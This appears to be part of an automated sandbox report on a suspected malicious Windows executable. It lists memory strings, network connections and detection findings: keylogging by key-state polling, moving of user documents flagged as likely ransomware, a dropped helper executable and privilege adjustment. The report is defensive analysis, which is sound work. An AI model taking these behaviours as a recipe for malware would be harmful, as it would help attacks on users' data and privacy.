Source: firefox.exe, 00000011.00000003.2448902266.000002435E0FB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2495309169.000002435E0F8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/subscription-services/
Source: places.sqlite-wal.17.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: firefox.exe, 00000011.00000003.2397264757.00000243681D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2471726860.00000243681D4000.00000004.00000800.00020000.00000000.sdmp, places.sqlite-wal.17.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000014.00000002.3339591404.000001F5277C8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C72C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3339469493.0000025EFE5F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000014.00000002.3339199055.000001F527590000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3342422429.00000184C78C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000017.00000002.3338800805.0000025EFE210000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000011.00000003.2320965039.000002435C167000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/Error
Source: firefox.exe, 00000011.00000003.2477581006.000002436844B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: firefox.exe, 00000011.00000003.2397264757.00000243681D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2471726860.00000243681D4000.00000004.00000800.00020000.00000000.sdmp, places.sqlite-wal.17.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000011.00000003.2491259190.000002435ED70000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2421599733.000002435ED70000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000011.00000003.2475632988.00000243684CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347089065.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326229478.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2470762903.00000243684D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2481127797.0000024365413000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2418178684.00000243684B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000011.00000003.2329837515.0000024368108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000011.00000003.2449029556.000002435E0EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2495445273.000002435E0EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: clean.exe, 00000005.00000003.2151715946.0000000002E80000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.softcatala.org
Source: firefox.exe, 00000011.00000003.2475632988.00000243684CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2347089065.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326229478.00000243684B3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2470762903.00000243684D1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2418178684.00000243684B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.wykop.pl/
Source: firefox.exe, 00000011.00000003.2329837515.0000024368108000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2477674869.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2476828386.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2326619496.0000024368363000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3338371718.00000184C7203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3339469493.0000025EFE503000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000011.00000003.2481127797.0000024365413000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000011.00000003.2470456832.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2474549451.00000243689D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000011.00000003.2413873750.00000243689D6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49930
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49893 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49927
Source: unknown Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 49927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49906
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49774 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:49788 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49867 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:49894 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:49893 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49927 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:49928 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.222.236.120:443 -> 192.168.2.5:49930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:49937 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49940 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:49938 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50030 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:50031 version: TLS 1.2
Potential key logger detected (key state polling based)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Code function: 0_2_00407391 GetFocus,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetClassNameA,strncmp,SendMessageA,GetKeyState,GetKeyState,GetKeyState,GetPropA,GetPropA,GetPropA,GetWindowThreadProcessId,GetCurrentProcessId, 0_2_00407391

Spam, unwanted Advertisements and Ransom Demands
barindex
Modifies existing user documents (likely ransomware behavior)
Source: C:\Windows\SysWOW64\cmd.exe File moved: C:\Users\user\Desktop\TTCBKWZYOC.xlsx Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File moved: C:\Users\user\Desktop\UQMPCTZARJ.docx Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File moved: C:\Users\user\Desktop\JDSOXXXWOA.docx Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File moved: C:\Users\user\Desktop\IVHSHTCODI.docx Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File moved: C:\Users\user\Desktop\MQAWXUYAIK.pdf Jump to behavior
Contains functionality to call native functions
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 22_2_00000184C7D42377 NtQuerySystemInformation, 22_2_00000184C7D42377
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 22_2_00000184C7E6AC72 NtQuerySystemInformation, 22_2_00000184C7E6AC72
Contains functionality to communicate with device drivers
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C5664E: DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl,DeviceIoControl, 10_2_00C5664E
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Code function: 0_2_004095B0 0_2_004095B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Code function: 0_2_004098E0 0_2_004098E0
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_004162A8 5_2_004162A8
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_0040C461 5_2_0040C461
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_0041F0F0 5_2_0041F0F0
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00426270 5_2_00426270
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00422226 5_2_00422226
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_004052F1 5_2_004052F1
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00426430 5_2_00426430
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_0041A788 5_2_0041A788
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00422960 5_2_00422960
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00426920 5_2_00426920
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_004279F3 5_2_004279F3
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00425B40 5_2_00425B40
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_0041FB10 5_2_0041FB10
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00427B81 5_2_00427B81
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00423BB0 5_2_00423BB0
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00427C5B 5_2_00427C5B
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00425D50 5_2_00425D50
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00401D2A 5_2_00401D2A
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C74AA2 10_2_00C74AA2
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C581E8 10_2_00C581E8
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C51553 10_2_00C51553
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C5174B 10_2_00C5174B
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C63737 10_2_00C63737
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C65AB6 10_2_00C65AB6
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C83C31 10_2_00C83C31
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C83D0B 10_2_00C83D0B
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 22_2_00000184C7D42377 22_2_00000184C7D42377
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 22_2_00000184C7E6AC72 22_2_00000184C7E6AC72
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 22_2_00000184C7E6ACB2 22_2_00000184C7E6ACB2
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 22_2_00000184C7E6B39C 22_2_00000184C7E6B39C
Enables security privileges
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Process token adjusted: Security Jump to behavior
Found potential string decryption / allocating functions
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: String function: 004272C0 appears 233 times
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: String function: 004020C6 appears 69 times
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: String function: 00C836F0 appears 382 times
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: String function: 00C51A79 appears 90 times
PE file contains executable resources (Code or Archives)
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Uses 32bit PE files
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal76.rans.troj.evad.winEXE@47/194@72/12
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C5D4AA __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 10_2_00C5D4AA
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C57E33 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle, 10_2_00C57E33
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe Code function: 10_2_00C57D72 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW, 10_2_00C57D72
Source: C:\Users\user\TMP\cr-20241021-53901\clean.exe Code function: 5_2_00413449 __EH_prolog,_CxxThrowException,_CxxThrowException,CoCreateInstance, 5_2_00413449
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Code function: 0_2_004037F1 FindResourceA,LoadResource,SizeofResource, 0_2_004037F1
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe File created: C:\Users\user\Desktop\ariac.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe File created: C:\Users\user\AppData\Local\Temp\24C7.tmp Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24C7.tmp\my_cleaner2.bat" "C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe""
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\7-Zip\7z.exe File read: C:\Users\user\TMP\cr-20241021-53901\clean\Zip\App\AppInfo\appinfo.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\TMP\cr-20241021-53901\ariac.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: firefox.exe, 00000011.00000003.2495309169.000002435E0F8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE timestamp BETWEEN date(:dateFrom) AND date(:dateTo);
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000000.2067858258.0000000000872000.00000002.00000001.01000000.00000003.sdmp, ariac.exe, 00000004.00000000.2076490201.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe, 0000000E.00000002.2237939929.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe.2.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000000.2067858258.0000000000872000.00000002.00000001.01000000.00000003.sdmp, ariac.exe, ariac.exe, 00000004.00000000.2076490201.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe, 0000000E.00000002.2237939929.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe.2.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000000.2067858258.0000000000872000.00000002.00000001.01000000.00000003.sdmp, ariac.exe, ariac.exe, 00000004.00000000.2076490201.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe, 0000000E.00000002.2237939929.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000000.2067858258.0000000000872000.00000002.00000001.01000000.00000003.sdmp, ariac.exe, 00000004.00000000.2076490201.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe, 0000000E.00000002.2237939929.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe.2.dr Binary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'realintegercannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %scannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygona2
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000000.2067858258.0000000000872000.00000002.00000001.01000000.00000003.sdmp, ariac.exe, ariac.exe, 00000004.00000000.2076490201.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe, 0000000E.00000002.2237939929.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: firefox.exe, 00000011.00000003.2496017415.000002435E06D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT sum(count) FROM events;
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000000.2067858258.0000000000872000.00000002.00000001.01000000.00000003.sdmp, ariac.exe, ariac.exe, 00000004.00000000.2076490201.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe, 0000000E.00000002.2237939929.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe.2.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000000.2067858258.0000000000872000.00000002.00000001.01000000.00000003.sdmp, ariac.exe, ariac.exe, 00000004.00000000.2076490201.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe, 0000000E.00000002.2237939929.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe, 00000000.00000000.2067858258.0000000000872000.00000002.00000001.01000000.00000003.sdmp, ariac.exe, ariac.exe, 00000004.00000000.2076490201.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe, 0000000E.00000002.2237939929.00000000011A6000.00000002.00000001.01000000.00000004.sdmp, ariac.exe.2.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: SecuriteInfo.com.W32.PossibleThreat.17916.5400.exe ReversingLabs: Detection: 23%
Source: ariac.exe String found in binary or memory: dht-listen-addr
Source: ariac.exe String found in binary or memory: --enable-dht6[=true|false] Enable IPv6 DHT functionality. Use --dht-listen-port option to specify port number to listen on. See also --dht-listen-addr6 option.
Source: ariac.exe String found in binary or memory: bt-stop-timeout
